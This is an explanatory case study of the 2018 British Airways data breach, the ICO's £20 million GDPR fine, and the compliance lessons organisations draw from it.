British Airways (BA) faced a significant data breach in 2018 that led to a substantial fine under the EU's General Data Protection Regulation (GDPR). The incident and subsequent investigation highlight key aspects of GDPR compliance and the potential consequences of non-compliance.

In the summer of 2018, a cyberattack compromised British Airways' systems, leading to the theft of personal data belonging to approximately 400,000 customers. The stolen data included:

• Names
• Addresses
• Credit card numbers
• CVV codes
• Travel booking details
• Login information

The attackers exploited poor security arrangements, redirecting users to a fraudulent website to harvest their data. The breach occurred because of compromised login credentials from a third-party supplier and an unsecured administrator password. BA also stored card details unnecessarily and in plaintext.

The UK Information Commissioner's Office (ICO) initially intended to fine British Airways £183.39 million. However, after negotiations, the fine was reduced to £20 million in October 2020. The financial strain of the COVID-19 pandemic was considered a factor in reducing the fine. Despite the reduction, it remained the largest GDPR fine issued by the ICO to that date. In addition to the fine, a class-action lawsuit was filed on behalf of affected customers, which was later settled out of court.

The ICO's investigation revealed that British Airways failed to comply with its obligations under the GDPR, specifically:

• Article 5(1)(f): Integrity and Confidentiality BA failed to process personal data in a manner that ensured appropriate security.
• Article 32: Security of Processing BA did not implement appropriate technical and organizational measures to protect personal data.

The ICO found that BA was negligent and could have prevented the breach by implementing readily available security measures, such as multi-factor authentication, limiting access to applications, and rigorous testing of systems.

The British Airways data breach serves as a case study in GDPR compliance failure, highlighting the importance of:

• Implementing robust security measures
• Maintaining up-to-date systems and software
• Monitoring for unauthorized changes to website code
• Complying with the PCI Data Security Standard (DSS)
• Gaining visibility into the partner ecosystem
• Promptly notifying affected individuals and regulatory agencies of data breaches
• Providing clear and transparent information about data processing activities
• Ensuring data minimization and limiting data retention
• Providing adequate training to employees on data protection requirements

By addressing these areas, organizations can better protect personal data and avoid significant GDPR fines and reputational damage.